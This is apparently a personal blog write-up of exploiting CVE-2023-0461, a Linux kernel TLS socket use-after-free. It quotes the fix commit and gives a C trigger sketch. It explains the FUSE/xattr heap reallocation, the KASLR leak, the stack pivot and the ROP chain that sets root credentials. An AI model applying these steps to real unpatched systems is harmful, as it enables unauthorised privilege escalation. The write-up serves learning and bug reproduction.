At the tender young age of 36 I decided to write my first exploit. Because I have been writing Linux kernel tests and bug reproducers for years, it looked like a good idea to target the Linux kernel.
The Linux kernel is probably the hardest thing I can expect to exploit in a reasonable time. I know less about browser internals and other things which appear to enjoy the same level of competition.
The payoff here being insight into what it takes rather than a direct monetary reward.
I chose to exploit a bug that was previously used in Google’s kernelCTF. It’s not a trendy bug with a marketing team. It’s just known by the name CVE-2023-0461. I chose it because it was the first bug in Google’s spreadsheet.
I don’t like the idea of exploiting fake bugs or bugs in older kernels without most of today’s mitigations. However I didn’t want to target a bug that has never been exploited.
I wanted to know for certain that overall exploitation was possible. Otherwise I could get discouraged and give up on a bug when actually I would learn an important lesson from pushing through.
Regardless of what I do next, I think it was well worth the effort to get this working.
This isn’t a rigorous write-up on a new technique or a zero-day. It’s just my thoughts on the exploitation. Nonetheless it contains many technical details, a lot of which will be difficult to follow unless you are already very familiar with the subject matter.
I have created a video on the last part of the exploit covering the ROP chain. I had the intention of covering the other sections too, but when I started trying to step through those bits it got very disjointed and confused. I may come back to those, perhaps after I come up with a better solution for the heap spray. Perhaps not.
I’m really stretching the Zig theme here, but yes the exploit is written in Zig. It’s terrible Zig code, I made no effort to clean it up. However there is now a Linux kernel exploit written in Zig.
I would speculate that Zig is an attractive language for exploit writers, for precisely the same reasons it’s attractive for writing embedded and system code. However there is no evidence of that presented here.
Note that more usefully there is also an LTP test which reproduces the bug. The Linux Test Project has a number of such tests.
The bug
The bug is in the “User Level Protocol” (ULP for short) layer on top of TCP sockets. In theory all ULPs are vulnerable, but I only looked at TLS.
The Linux TLS module allows applications to offload some processing to the kernel or hardware. Once you have established a TCP connection and done the public key cryptography bit then the ULP allows you to offload the synchronous cryptographic stage to the kernel.
The bug was originally exploited (probably) by “D3v17 - savy@syst3mfailure.io”. They used it against the mitigation bypass target in Google’s kernelCTF. I’m looking at their exploit and write-up for the first time now and it is mostly a mystery to me.
The steps to reproduce the bug are the same, but that is where the similarities end. They didn’t resort to using FUSE and instead found a way to get their hands on those elastic objects I keep hearing about.
We’ll come back to how annoyed I am at using FUSE later. For now let’s look at my description of the bug which I wrote for the LTP test.
Reproducer for CVE-2023-0461 which is an exploitable use-after-free in a TLS socket. In fact it is exploitable in any User Level Protocol (ULP) which does not clone its context when accepting a connection.
Because it does not clone the context, the child socket which is created on accept has a pointer to the listening socket’s context. When the child is closed the parent’s context is freed while it still has a reference to it.
TLS can only be added to a socket which is connected. Not listening or disconnected, and a connected socket can not be set to listening. So we have to connect the socket, add TLS, then disconnect, then set it to listening.
To my knowledge, setting a socket from open to disconnected requires a trick; we have to “connect” to an unspecified address. This could explain why the bug was not found earlier.
The accepted fix was to disallow listening on sockets with a ULP set which does not have a clone function.
It took me a while of scanning the kernel code to find out that the connect system call can be used to disconnect a socket. I reviewed the locations where the socket state is updated and this appears to be the only place that meets the criteria.
This is written in the connect Linux man pages, but I wouldn’t have thought to look there because… you know, the name. I also must have seen this information before, but strangely enough my initial thought was that this bug is impossible because socket state transitions are one way.
For stream sockets at least this would match the BSD man pages. I find the POSIX page painful to read, but it doesn’t appear to address calling connect multiple times on a connection mode socket. It is left open to implementation.
This bug is probably a sin of omission, that is one where the software developer did not take into account some possible program state. If that is the case then I would also say that the semantic overloading of connect did not help.
Reproducing
I’m not sure how the bug was found, but I was starting with a CVE and fix commit with no reproducer. So the first step is to find a way of reliably reproducing the bug.
Below is the fix commit.
commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
Author: Paolo Abeni <pabeni@redhat.com>
Date: Tue Jan 3 12:19:17 2023 +0100
net/ulp: prevent ULP without clone op from entering the LISTEN status
When an ULP-enabled socket enters the LISTEN status, the listener ULP data
pointer is copied inside the child/accepted sockets by sk_clone_lock().
The relevant ULP can take care of de-duplicating the context pointer via
the clone() operation, but only MPTCP and SMC implement such op.
Other ULPs may end-up with a double-free at socket disposal time.
We can't simply clear the ULP data at clone time, as TLS replaces the
socket ops with custom ones assuming a valid TLS ULP context is
available.
Instead completely prevent clone-less ULP sockets from entering the
LISTEN status.
Fixes: 734942cc4ea6 ("tcp: ULP infrastructure")
Reported-by: slipper <slipper.alive@gmail.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Link: https://lore.kernel.org/r/4b80c3d1dbe3d0ab072f80450c202d9bc88b4b03.1672740602.git.pabeni@redhat.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
index 848ffc3e0239..d1f837579398 100644
--- a/net/ipv4/inet_connection_sock.c
+++ b/net/ipv4/inet_connection_sock.c
@@ -1200,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
 }
 EXPORT_SYMBOL(inet_csk_prepare_forced_close);
+static int inet_ulp_can_listen(const struct sock *sk)
+{
+	const struct inet_connection_sock *icsk = inet_csk(sk);
+
+	if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
+		return -EINVAL;
+
+	return 0;
+}
+
 int inet_csk_listen_start(struct sock *sk)
 {
 	struct inet_connection_sock *icsk = inet_csk(sk);
 	struct inet_sock *inet = inet_sk(sk);
 	int err;
+	err = inet_ulp_can_listen(sk);
+	if (unlikely(err))
+		return err;
+
And then the CVE description, which was perhaps updated at some point. I will go with what’s in my notes.
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.
There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener.
If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.
So there is no hint at how one disconnects a TCP socket, and actually we need more than that. We want to set the lower level socket state to SS_UNCONNECTED. Otherwise we can’t call listen. This is different from the TCP level connection.
Disconnecting a TCP socket can be done at least two other ways: you can close the other end or call shutdown. However that won’t set the socket state to SS_UNCONNECTED unless the connection was never fully established. That will just set the TCP state to TCP_CLOSE.
If the connection is never fully established then we can not set the ULP to TLS. So we need to fully establish the connection, then reset both the socket and TCP states. Which, as I already mentioned, is done using connect with an address of AF_UNSPEC.
Once we know how to do it, it is relatively straightforward to reproduce. First we create a connection and call setsockopt on the connected socket to add TLS to it. Then we call connect with AF_UNSPEC to set SS_UNCONNECTED and TCP_CLOSE on the socket. Finally we call listen and accept to accept an incoming connection, then close that connection.
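The middle of that sequence can be sketched in C as follows. This is a minimal sketch, not the LTP test or the exploit itself: the function names are made up for illustration, the socket passed in is assumed to be an already connected TCP socket, and the final accept and close steps are left out. The fallback value for TCP_ULP is taken from the Linux UAPI headers for the benefit of older libc headers.

```c
#include <assert.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>

#ifndef TCP_ULP
#define TCP_ULP 31 /* Linux UAPI value, for libc headers that lack it */
#endif

/* Build the address that makes connect() act as a disconnect. */
struct sockaddr unspec_addr(void)
{
	struct sockaddr addr;

	memset(&addr, 0, sizeof(addr));
	addr.sa_family = AF_UNSPEC;
	return addr;
}

/*
 * Hypothetical helper: take an already connected TCP socket through the
 * states described above. Returns 0 if listen() succeeded, otherwise the
 * negated errno of the step that failed. With the fix commit applied,
 * the listen() step is expected to fail with EINVAL.
 */
int ulp_socket_to_listener(int connected_fd, const char *ulp)
{
	struct sockaddr addr = unspec_addr();

	assert(ulp != NULL);

	/* 1. Attach the ULP (e.g. "tls"); only allowed while connected. */
	if (setsockopt(connected_fd, IPPROTO_TCP, TCP_ULP, ulp, strlen(ulp)))
		return -errno;

	/* 2. "Connect" to AF_UNSPEC to reset the socket and TCP states. */
	if (connect(connected_fd, &addr, sizeof(addr)))
		return -errno;

	/* 3. Listen while the socket still carries the ULP context. */
	if (listen(connected_fd, 1))
		return -errno;

	return 0;
}
```

Calling ulp_socket_to_listener(fd, "tls") on a connected socket covers the setsockopt, connect and listen steps; a second client would then connect to the new listener so that accept returns the child socket which shares the context.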
When that final connection is closed it will free tls_context while the listening socket still has a reference to it.
There are no race conditions and we could easily trigger the free multiple times once we have a listening socket with a tls_context. No instability comes from this part of the process.
Heap spray
At this point I knew that a use-after-free is useful for causing a type confusion. That is, the freed memory we still have a pointer to can be reallocated as a different type of object.
More than one type of object then shares the same memory, so that we can corrupt the memory from the POV of one or both of the objects.
The active Linux heap allocator (SLUB) uses various object caches. Some important objects get their own cache. Most however are allocated from general purpose caches of different sizes.
The tls_context object is allocated in the kmalloc-512 cache. There are multiple ways to find this out, including looking at the size of the struct (328) and the flags it is allocated with (GFP_KERNEL).
Also, by adding slub_debug=T,*-512 to the kernel command line and then doing the allocation, we will see which 512 cache it is in. If we don’t know the size of the struct then debugging with gdb or tracing with kernel probes can show which cache is used.
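The step from a 328 byte struct to kmalloc-512 is just rounding up to the next general purpose size class. A minimal sketch of that lookup, assuming the usual size classes of an x86-64 kernel with 4 KiB pages (the table and the function name are illustrative, not kernel code):

```c
#include <assert.h>
#include <stddef.h>

/*
 * General purpose kmalloc size classes, assuming a typical x86-64 build.
 * Larger requests are not covered by this sketch.
 */
static const size_t kmalloc_sizes[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192,
};

/* Return the object size of the smallest class that fits `size`, or 0. */
size_t kmalloc_bucket(size_t size)
{
	size_t n = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

	assert(size > 0);
	for (size_t i = 0; i < n; i++) {
		if (size <= kmalloc_sizes[i])
			return kmalloc_sizes[i];
	}
	return 0; /* too large for the classes listed here */
}
```

With these assumptions kmalloc_bucket(328) gives 512, because 328 does not fit in the 256 byte class and there is nothing in between. The size alone does not say whether the object lands in kmalloc-512 or kmalloc-cg-512; that depends on the allocation flags.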
Based on various writeups I had read (sorry I lost track of where I first saw some things), there are a number of objects, such as msg_msg and sk_buff, that can be allocated in any cache size and are mostly full of attacker controlled data.
So I started trying to heap spray these objects, however I didn’t appear to be getting any hits. Using some of the tracing methods mentioned above I realised that these objects were being allocated in kmalloc-cg-512, not kmalloc-512.
Looking at their allocations, they use GFP_KERNEL_ACCOUNT not GFP_KERNEL. On the face of it this flag has something to do with memory counters used in control groups. However it now also causes objects to be allocated in a different cache.
This is good for security because a lot of juicy variable length objects containing arbitrary user data are now segregated from everything else.
At this point I knew I could arbitrarily free any object in the kmalloc-512 cache. I wasn’t sure what to do with that though. I also knew that cross cache attacks are possible, however I assumed it would be easier to find an object in the same cache. So I started looking for more objects I could use to replace msg_msg.
I became fixated with splice and writev. Firstly because I read about some ancient attack that hasn’t worked since the introduction of copy_to/from_user. I should have known better, but at least at this point I could see that my heap spray worked.
Secondly I moved onto bio_vec which is used when splicing between pipes, because it can allocate an object in kmalloc-512 and then block. The problem is the object is a bio_vec array which contains pointers to struct page. These pages are mapped in just before use.
I didn’t have anything to pass as a pointer to a struct page at this point. I suppose that if I knew any valid page addresses (or pfn) then this could be used to read or write to it.
Finding a suitable object was by far not the only problem. To my knowledge the free is delayed by up to 5000 jiffies, which appears to be 5 seconds on the target kernel config.
This is because the context is freed with kfree_rcu which batches up frees. The maximum batch age is 5000 jiffies and on my quiet system I would often hit that. I suppose the time could be reduced by spamming frees, but then that could interfere with other things.
Throughout the exploit development I would accidentally introduce a change that put the wrong object into the freed slot. In one case I also moved the free and allocation to different processes and therefore different CPUs. Each CPU has its own free list, so this also stopped it from working. It was the main source of instability and confusion.
I have a couple of pages of notes and ideas from this stage. Plus there will be more stuff that I looked into, but didn’t bother to write down. This is the part of the exploit I would most like to revisit.
FUSE
What I did know at this point was that there was a well proven heap spray technique using FUSE and extended file attributes. Originally it was done with userfaultfd.
I don’t like this technique because I think it can be easily mitigated like userfaultfd. It relies on the attacker having access to /dev/fuse and either fusermount or unprivileged user namespaces.
On a desktop it is quite likely that all users have access to /dev/fuse, but the only processes that need access to this are file system daemons. So there are obvious ways to shut down this attack vector.
Having said that, it may not be convenient for desktops to restrict access to /dev/fuse. FUSE is extremely useful. So I don’t see it going away altogether. Unlike userfaultfd, the absence of which has probably not bothered many people outside of data centers.
I have written two articles about FUSE already.
The second article is about using the raw FUSE interface which was partially motivated by this exploit.
I found that using the raw FUSE interface I don’t need to use the mmap page fault technique described in Chompie’s blog. Instead of mapping a file and blocking while reading from the file, I block on processing the xattr request itself.
I don’t know that I need to use the raw interface for this or that it is the better way to do it. However I wanted to poke at the raw interface and I poked it.
Needless to say it added a fair chunk of time onto the exploitation. Still, using FUSE at least, was the right thing to do because the probability it wouldn’t work was very low.
Using this method I don’t really do heap spray. I just allocate a single xattr after a delay. It usually gets the freed slot so long as the free and the alloc happen on the same CPU. This works on my very quiet VM, but I guess it would not fare so well with more noise.
One last note on FUSE is that there are a lot of FUSE message types and I would be surprised if the xattr messages are the only two of interest to attackers. FUSE gives user land the ability to pause inside a whole bunch of internal kernel operations.
KASLR
Now that I could overlap xattr buffers with tls_context I could read the content of tls_context. A caveat is that xattr zeros its buffer, also zeroing tls_context. This corrupts tls_context because after being initialised it contains a couple of pointers.
Luckily these pointers are not used much. Without touching them we are able to set the encryption keys used for transmitting or receiving using setsockopt. This writes lots of interesting things into tls_context.
One of these things is a function pointer to tls_sw_push_pending_record (or tls_device_push_pending_record if hardware with TLS offload is present). We can write this pointer into the xattr buffer while blocking the FUSE request. When setsockopt returns we can then allow the FUSE request to continue and read back the internal kernel pointer.
We need a function pointer because of address layout randomisation. If KASLR is enabled then the kernel shifts its address space by some amount, so that every symbol is offset from its default location.
However the symbols are all still in the same order and there are no random gaps introduced between them. So if we retrieve a pointer to a known symbol, then we can calculate the location of any symbol.
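The arithmetic is a subtraction followed by an addition. A minimal sketch, assuming the leaked symbol lives in the core kernel image and that the unrandomised addresses come from the symbol table of the exact kernel binary being attacked; the helper names and the addresses in the example are made up for illustration:

```c
#include <assert.h>
#include <stdint.h>

/* Slide = where the symbol actually is minus where the symbol table says. */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t static_addr)
{
	return leaked_addr - static_addr;
}

/* Apply the same slide to any other symbol from the same image. */
uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
	return static_addr + slide;
}

/* Worked example with invented addresses, not taken from a real kernel. */
void kaslr_example(void)
{
	uint64_t static_leaked = 0xffffffff81c00000ULL; /* symbol table value */
	uint64_t leaked        = 0xffffffff9ac00000ULL; /* read back via xattr */
	uint64_t static_other  = 0xffffffff810b0000ULL; /* some other symbol */

	uint64_t slide = kaslr_slide(leaked, static_leaked);

	assert(slide == 0x19000000ULL);
	assert(rebase(static_other, slide) == 0xffffffff9a0b0000ULL);
}
```

Every gadget address used later in a ROP chain has to be rebased in the same way before it is written into memory.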
RIP
The more sensitive reader may want to turn away now as things are going to get really ROPey.
At last I could read and write to tls_context. This doesn’t instantly grant root privileges though. The structure doesn’t contain a pointer to the process credentials. Plus it’s not obvious to me how to write to some arbitrary memory just using tls_context without hijacking kernel control flow.
Interestingly tls_context can contain an indirect reference to the creds via ctx->priv_ctx_rx->strp.sk->sk_socket->file->f_cred if we setup encryption for receiving data. I say interesting because any time we have a socket or sk pointer we know an arbitrary read would allow us to find the task creds.
I like the idea of a data only attack, however I didn’t see a clear path to getting arbitrary R/W. I expect it’s totally possible, especially by adding more object types to the type confusion.
With a data only attack I wouldn’t have to use a code reuse attack like ROP or JOP. This seemed attractive for a number of reasons, not least that ROP appeared magical, but also because the chain is specific to a particular kernel binary.
The fact is though that tls_context provides access to at least three function pointers which I can overwrite and execute. So that is three different places where I can try to launch my attack. I gather this is really good.
That isn’t to say it is easy though, as each location requires different setup to execute. We have to execute the function pointer without crashing the kernel before or afterwards.
Note that, back in the bad old days, I would have just been able to write some shell code (I don’t know why the word shell is there, it’s just code) into tls_context, then point one of the function pointers at it. This would then get executed like any other kernel code.
These days the heap memory where tls_context lives is not executable. So if we try that the CPU will refuse to execute it. We can set memory to be executable, but we need code execution to do it, so there is a chicken and egg issue there.
Hence if we want to take control of execution we have to reuse existing code. The code we want though is something like the following.
// resets credentials to root in the root user namespace
void escalate_privs(void) {
    commit_creds(prepare_kernel_cred(NULL));
}
If you are writing a kernel, then don’t include a handy function like this. Indeed Linux does not include such code. This does not stop us though because of the way the jmp, call and ret CPU instructions work (for now).
The call instruction takes an address, any executable address, and updates rip to it after pushing the current value of rip to the stack. Meanwhile the ret instruction pops the top value off the stack into rip.
Updating rip changes the next instruction the CPU will execute. Presently there is nothing to stop us from passing an address to call which is not the start of a function.
Likewise ret will jump to whatever value is at the top of the stack. Furthermore we can change the location of the stack, including to heap memory that we control.
So each function has at least one ret instruction and we can jump to the instructions just before each ret to do whatever. The useful sequence of one or more instructions in front of each ret is called a gadget.
We can put the addresses of gadgets on the stack and the ret instructions at the end of each gadget will link them together. This forms a ROP chain, where ROP stands for Return Oriented Programming.
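How ret links gadgets together can be modelled with a toy interpreter. The sketch below is a simulation only: the "addresses" are small made-up numbers rather than kernel text, the two functions are stand-ins for the credential functions mentioned earlier, and nothing here touches a real stack. Each loop iteration plays the role of one ret, popping the next value from the chain into rip.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy CPU state: two registers plus a stack pointer into the chain. */
struct cpu {
	uint64_t rax, rdi;
	const uint64_t *rsp;
	uint64_t committed; /* what the toy commit function received */
};

/* Made-up "addresses" standing in for gadget locations in kernel text. */
enum {
	G_POP_RDI = 1,  /* pop rdi; ret */
	G_PREPARE_CRED, /* function stand-in: rax = new cred built from rdi */
	G_MOV_RDI_RAX,  /* mov rdi, rax; ret */
	G_COMMIT_CREDS, /* function stand-in: install the cred in rdi */
	G_HALT,         /* stop the simulation */
};

#define TOY_CRED 0xc0ffeeULL

/* Each iteration models one `ret`: pop the next address into rip. */
void run_chain(struct cpu *cpu)
{
	for (;;) {
		uint64_t rip = *cpu->rsp++;

		switch (rip) {
		case G_POP_RDI:
			cpu->rdi = *cpu->rsp++; /* gadget consumes one stack slot */
			break;
		case G_PREPARE_CRED:
			cpu->rax = TOY_CRED;
			break;
		case G_MOV_RDI_RAX:
			cpu->rdi = cpu->rax;
			break;
		case G_COMMIT_CREDS:
			cpu->committed = cpu->rdi;
			break;
		default:
			return;
		}
	}
}

/* Build and run a chain equivalent to commit(prepare(NULL)). */
uint64_t rop_example(void)
{
	static const uint64_t chain[] = {
		G_POP_RDI, 0, /* first argument = NULL */
		G_PREPARE_CRED,
		G_MOV_RDI_RAX, /* pass the return value as the next argument */
		G_COMMIT_CREDS,
		G_HALT,
	};
	struct cpu cpu = { .rsp = chain };

	run_chain(&cpu);
	assert(cpu.rsp == chain + sizeof(chain) / sizeof(chain[0]));
	return cpu.committed;
}
```

The chain is nothing more than an array of numbers in memory we control, which is why moving the stack pointer onto that memory is the step that starts everything.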
That’s not all though, because the various jmp instructions can also be used to set rip. There seem to be a variety of ways in which to construct a JOP gadget. In the end I just used ROP.
Note that finding ROP and JOP gadgets in general is easy because of the tooling available. Constructing them into a chain is more challenging, although I’m sure a constraint solver or similar could partially automate that as well.
I extracted the gadgets using the method described here. Then constructed the chain by grepping for suitable gadgets. Notably ChatGPT was useful for describing the purpose of basic x86 instructions and registers. It seems to have synthesized the various sources of x86 documentation well.
Initially I was not sure I could use a ROP chain. I knew I had to change the stack location rsp, but I wasn’t sure it would be allowed. This wasn’t an issue though; apparently no distinction is drawn between stack and heap locations.
Secondly I don’t have the address of tls_context. I have addresses to other memory locations within it, but not the structure itself. There is a pointer to a small amount of memory I control which is used to store some encryption gubbins, however it is too small for a ROP chain.
I noted though that if a register contains tls_context already then I can move that value into rsp using the first gadget. The first items in tls_context aren’t used for a lot of operations, so I can overwrite them with return addresses.
In the middle of tls_context there are some function pointers which we want to use to start the ROP chain. So we have to stack pivot over those. After that there is plenty of space to store a ROP chain.
The first place I tried to take rip control turned out to be a bad spot. Firstly it wanted to use the tls_context.sk_proto pointer which had been wiped when allocating xattr.
It only wanted one field in sk_proto, which turned out to be a function pointer. This wasn’t the function pointer I was originally targeting, but it was needed to reach the original, so I targeted it instead.
I couldn’t fake the whole sk_proto object because it is too large to fit in the memory I control. However only one field is accessed at a given offset. So I could fake that one field and put a pointer in ctx->sk_proto which is offset by the distance to the field.
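The offset trick can be written down as plain address arithmetic. In this sketch struct big_ops is a hypothetical stand-in for the real structure, with an invented layout, and the addresses are made up; the point is only that the fake base is the controlled slot minus the field offset, so that the kernel’s read of base->target lands on the slot.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for a large kernel struct; only `target` is read. */
struct big_ops {
	char other_fields[200];
	void (*target)(void);
	char more_fields[200];
};

/*
 * Given the address of a pointer sized slot we control, return the fake
 * struct base to store in the victim pointer so that base->target reads
 * exactly that slot. The rest of the fake struct is never touched.
 */
uint64_t fake_base_for(uint64_t controlled_slot)
{
	return controlled_slot - offsetof(struct big_ops, target);
}

/* Worked example with an invented heap address. */
void fake_base_example(void)
{
	uint64_t slot = 0xffff888012345600ULL;
	uint64_t base = fake_base_for(slot);

	/* The field access the victim code performs resolves to our slot. */
	assert(base + offsetof(struct big_ops, target) == slot);
	assert(base < slot);
}
```

The memory between the fake base and the slot does not need to be controlled or even valid, as long as the code path only reads the one field.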
This worked, but then I discovered that I had made a mistake. I thought that a pointer to tls_context would be in one of the registers at the call site which would start the ROP chain. It turns out that I was looking at a point in the execution just before the call site.
The register containing the context was cleared just before the call. So now I didn’t know where the location of my chain was. Instead of giving up on this path immediately I decided to try dereferencing the sk pointer which was in a register, as the sk structure also contained a pointer to the context.
I would have to do this with JOP and didn’t grasp how to do that. I think it should be possible using a suitable JOP gadget that jumps to a location specified by a register I control. However I gave up and moved to another location to take RIP control.
This time I tried ctx->push_pending_record which can be called by setting ctx->pending_open_record_frags to true and sending a control message with sendmsg. This isn’t the only way to call it, but it appears to be the easiest.
I also got lucky because it has the context in the rax register and there is a ROP gadget which simply copies rax into rsp, thus setting the stack to the context.
Not only that, but I discovered that cmsg allocates a variable sized object with GFP_KERNEL with only a small bit of header data. Potentially that is a replacement for xattr! Although I don’t know how a cmsg payload could be read back to user space.
Anyway I ignored that and managed to write a ROP chain that calls the necessary functions to set the creds. It’s only a very small amount of code, but it was not easy.
The biggest issue was restoring the stack pointer to its original value after elevating privileges. I can’t leave the stack pointing to the context if I want to gracefully return from push_pending_record and back to user land.
I couldn’t think of a way to save the rsp register, so that it could be restored later. I guess it’s possible with JOP, but I had already given up on that. It so happened though that 4 of the registers contained pointers to locations on the original stack.
It took a while, but I found a simple sequence of gadgets that calculated the original rsp value from rbx and restored it. After that I just had to do something with the newly gained privileges and that was it, the exploit was complete.
Writing a ROP chain is rather odd compared to writing plain assembly. The instructions which immediately appear before a ret are constrained by the x86 calling convention. It’s impossible to find mov with some pairs of registers for example. Even if you look at gadgets with multiple instructions, the compiler just doesn’t produce some things.
On the other hand it is surprising what it does produce. Although I guess ROPgadget looks at misaligned instructions as described in the book Practical Binary Analysis. So it’s not necessarily the case that the gadgets it finds are part of the kernel.
Shell
When the exploit successfully returns to user land, it just starts a shell. When the shell closes the kernel crashes because the tls_context is still corrupted and closing the socket causes some zeroed fields to be accessed. This can be fixed of course, it just requires more cleanup.
Because of the way I use FUSE the exploit requires unprivileged user namespaces to mount the FUSE FS. This is only because there is no fusermount in my image and my raw FUSE implementation doesn’t implement something needed to use fusermount anyway. Again this could be fixed, but I’d be more interested in switching away from FUSE.